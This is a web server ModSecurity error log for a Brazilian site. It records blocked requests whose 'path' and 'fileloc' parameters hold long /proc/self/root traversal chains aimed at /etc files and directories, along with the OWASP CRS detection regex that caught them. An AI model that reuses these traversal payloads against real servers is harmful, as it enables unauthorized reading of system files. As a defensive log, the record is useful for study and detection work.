https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:07:28.688296 2026] [:error] [pid 11642:tid 140411616036608] [client 74.7.243.128:47762] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyMLninkcc-iUj5AoxcwAAA48"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:07:39.685913 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.243.128:51974] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyOvqxLDW4GITHUkS1xwAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:07:56.364290 2026] [:error] [pid 9818:tid 140411574073088] [client 74.7.241.31:45542] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyTF1pVZ5mVmJwsFMFDQAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:07:57.639635 2026] [:error] [pid 21219:tid 140411607643904] [client 74.7.241.31:48624] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc5.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyTfXLqtnMIWvjpaJtJAAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:07:59.135345 2026] [:error] [pid 10189:tid 140411590858496] [client 74.7.241.31:48632] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyTjJ3M9BSuKP7CAbkegAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:08:00.514993 2026] [:error] [pid 10189:tid 140411674785536] [client 74.7.241.31:48638] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyUDJ3M9BSuKP7CAbkfQAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:08:03.327201 2026] [:error] [pid 10189:tid 140411548894976] [client 74.7.241.31:48648] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/localtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyUzJ3M9BSuKP7CAbkgQAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:08:05.230436 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:53866] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyVda6ubjKNq_cu4ai_QAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:08:09.754146 2026] [:error] [pid 31215:tid 140411599251200] [client 74.7.243.128:56426] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyWQF0L0L-SsrnPo48CAAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:08:13.411603 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.241.31:48658] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyXRCii7xarUs8iHY4sAAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:08:23.534010 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:40084] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyZ9a6ubjKNq_cu4ajDQAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:08:28.028160 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.241.31:40922] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzybNa6ubjKNq_cu4ajFAAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:08:31.857242 2026] [:error] [pid 11167:tid 140411540502272] [client 74.7.243.128:35802] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyb_HIg5MgXLBnicPPSAAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:08:46.063648 2026] [:error] [pid 7235:tid 140411607643904] [client 74.7.241.31:58410] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyffqxLDW4GITHUkS19wAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:08:47.412075 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.241.31:34664] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyf-oXxyEfFpUF8f9X2AAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:08:51.347662 2026] [:error] [pid 9818:tid 140411624429312] [client 74.7.241.31:34666] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyg11pVZ5mVmJwsFMFJAAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:08:54.677535 2026] [:error] [pid 9818:tid 140411565680384] [client 74.7.241.31:34678] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyhl1pVZ5mVmJwsFMFKAAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:08:57.200368 2026] [:error] [pid 10189:tid 140411649607424] [client 74.7.241.31:34684] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyiTJ3M9BSuKP7CAbkwgAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:08:58.564175 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.241.31:52614] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyita6ubjKNq_cu4ajLQAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:09:44.411412 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.241.31:52630] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyuOoXxyEfFpUF8f9YFQAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:09:45.675905 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.241.31:43476] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyuda6ubjKNq_cu4ajTAAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
